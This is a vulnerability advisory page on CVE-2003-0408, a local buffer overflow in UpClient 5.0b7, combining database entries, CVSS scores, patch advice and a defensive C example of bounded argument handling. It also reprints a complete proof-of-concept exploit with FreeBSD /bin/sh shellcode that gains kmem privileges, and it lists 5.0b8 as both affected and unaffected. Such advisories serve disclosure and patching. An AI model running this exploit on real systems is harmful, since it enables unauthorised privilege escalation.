CVE-2003-0408
CVSS 7.2
Published: 2003-06-30 00:00:00
Revised: 2016-10-17 22:33:37

[Original] Buffer overflow in Uptime Client (UpClient) 5.0b7, and possibly other versions, allows local users to gain privileges via a long -p argument.


[CNNVD] Upclient local buffer overflow vulnerability (CNNVD-200306-128)

        
        Uptime Client is a tool that tracks a host's uptime and reports it to a server, so that users can compare their figures against other hosts' statistics.
        The upclient program does not properly bounds-check its command-line arguments; a local attacker can exploit this to trigger a buffer overflow and execute arbitrary code with 'kmem' privileges.
        A local attacker can pass an overly long string as a command-line argument to upclient to trigger the overflow; carefully crafted string data may allow arbitrary code to run on the system with 'kmem' privileges.
        Upclient is, however, normally installed as an optional package and is not installed on FreeBSD by default.
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Access complexity: LOW [no special access conditions are required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0408
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0408
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-128
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=105405629622652&w=2
(UNKNOWN)  BUGTRAQ  20030527 NuxAcid#002 - Buffer Overflow in UpClient
http://www.iss.net/security_center/static/12131.php
(VENDOR_ADVISORY)  XF  upclient-command-line-bo(12131)
http://www.securityfocus.com/bid/7703
(VENDOR_ADVISORY)  BID  7703

- Vulnerability information

Upclient local buffer overflow vulnerability
High risk   Boundary condition error
2003-06-30 00:00:00 2005-10-20 00:00:00
Local
        
        

- Advisories and patches

        Vendor patch:
        The Uptimes Project
        -------------------
        The vendor has released an upgrade that fixes this issue. Download UpClient 5.0b8 from the vendor's homepage:
        https://sourceforge.net/projects/upclient/

- Vulnerability information (22661)

Upclient 5.0 b7 Command Line Argument Buffer Overflow Vulnerability (EDBID:22661)
freebsd local
2003-05-27 Verified
0 Gino Thomas
N/A
source: http://www.securityfocus.com/bid/7703/info

upclient has been reported prone to a buffer overflow vulnerability when handling command line arguments of excessive length.

It is possible for a local attacker to seize control of the vulnerable application and have malicious arbitrary code executed in the context of upclient, which is typically installed setuid kmem.

An attacker may harness elevated privileges obtained in this way to manipulate arbitrary areas in system memory through /dev/mem or /dev/kmem devices.

/*
*
* NuxAcid - UPCLIENT Local Buffer Overflow Exploit
* written on/for FreeBSD
* tested against UpClient 5.0b7 on FreeBSD 4.8
* for FreeBSD 5.x the code has to be tweaked
* other versions may be vulnerable too
*
* 2003 by Gino Thomas, http://www.nux-acid.org
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* execl() */

#define BUFFERSIZE 1022

/* not referenced below; kept as in the original listing */
unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
    char buffer[BUFFERSIZE] = "";

    //FreeBSD exec/setuid Shellcode
    static char shellcode[] =
    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

    memset(buffer, 0x90, sizeof(buffer));
    *(long *)&buffer[BUFFERSIZE - 4] = 0xbfbffb21;
    *(long *)&buffer[BUFFERSIZE - 8] = 0xbfbffb21;
    *(long *)&buffer[BUFFERSIZE - 16] = 0xbfbffb21;
    memcpy(buffer + BUFFERSIZE - 16 - strlen(shellcode), shellcode, strlen(shellcode));

    execl("/usr/local/sbin/upclient", "upclient", "-p", buffer, NULL);
    return 0;
}

		

- Vulnerability information

4842
UpClient upclient Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

The UpTime Project client contains a flaw that may allow a local user to gain elevated privileges. The issue is due to a flaw in the 'uptime' utility not properly sanitizing input to the "-p" switch. If an attacker provides a specially crafted request, they may overflow a buffer and execute arbitrary code with kmem privileges.
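The CNNVD summary, the BID text and the OSVDB description above all come down to one bug class: an option value taken from argv and copied into a fixed-size buffer without a length check. The following C program is an added example, not code from the UpClient project or from any of the advisories quoted on this page. It places the unchecked copy next to a bounded version that refuses over-long values, and scans argv for a hypothetical "-p" option the way a small client would. The names OPT_MAX, copy_option_unchecked, copy_option_checked and parse_p_option are chosen for this example.

```c
/* Added example (not the upclient project's code): bounded handling of a
 * command-line option value, with the unsafe pattern shown for contrast. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical size of the buffer that receives the -p value. */
#define OPT_MAX 64

/* Vulnerable pattern, shown for comparison only: an unbounded copy into a
 * fixed buffer. Any value of OPT_MAX bytes or more overruns 'dest' and
 * clobbers whatever follows it on the stack. */
void copy_option_unchecked(char *dest, const char *value)
{
    strcpy(dest, value);
}

/* Hardened version: measure first, then copy only if the value plus its
 * terminating NUL fits. Returns 0 on success, -1 if the value is too long;
 * nothing is written to 'dest' on failure. */
int copy_option_checked(char *dest, size_t dest_size, const char *value)
{
    size_t len = strlen(value);
    if (dest_size == 0 || len >= dest_size)
        return -1;
    memcpy(dest, value, len + 1);
    return 0;
}

/* Scan argv for "-p <value>" and store the value in 'out'.
 * Returns 0 when a value was stored, 1 when -p was not supplied,
 * and -1 when the supplied value does not fit in 'out'. */
int parse_p_option(int argc, char **argv, char *out, size_t out_size)
{
    for (int i = 1; i + 1 < argc; i++) {
        if (strcmp(argv[i], "-p") == 0)
            return copy_option_checked(out, out_size, argv[i + 1]);
    }
    return 1;
}

int main(int argc, char **argv)
{
    char pvalue[OPT_MAX];
    int rc = parse_p_option(argc, argv, pvalue, sizeof pvalue);

    if (rc < 0) {
        fprintf(stderr, "-p: value too long (at most %d bytes)\n", OPT_MAX - 1);
        return 1;
    }
    if (rc == 0)
        printf("-p = %s\n", pvalue);
    return 0;
}
```

The hardened copy rejects rather than truncates. For a privileged (setuid or setgid) binary that is the right choice: a silently truncated value changes what the program does without telling the user, while a hard error fails closed. Compile with `cc -o optcheck optcheck.c` and run `./optcheck -p $(head -c 300 /dev/zero | tr '\0' A)` to exercise the rejection path.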

- Timeline

2003-05-27 2003-05-23
2003-05-27 Unknown

- Solution

Upgrade to version 5.0b8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

Upclient Command Line Argument Buffer Overflow Vulnerability
Class: Boundary Condition Error    BID: 7703
Remote: No    Local: Yes
Published: 2003-05-27 12:00:00    Updated: 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to Gino Thomas <g.thomas@nux-acid.org>.

- Affected versions

The Uptimes Project upclient 5.0 b7
The Uptimes Project upclient 5.0 b8

- Unaffected versions

The Uptimes Project upclient 5.0 b8

- Vulnerability discussion


- Exploit

The following proof of concept exploit has been provided by Gino Thomas:

- Solution

The vendor has released a fix to address this issue:


The Uptimes Project upclient 5.0 b7

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on the relevant MITRE websites.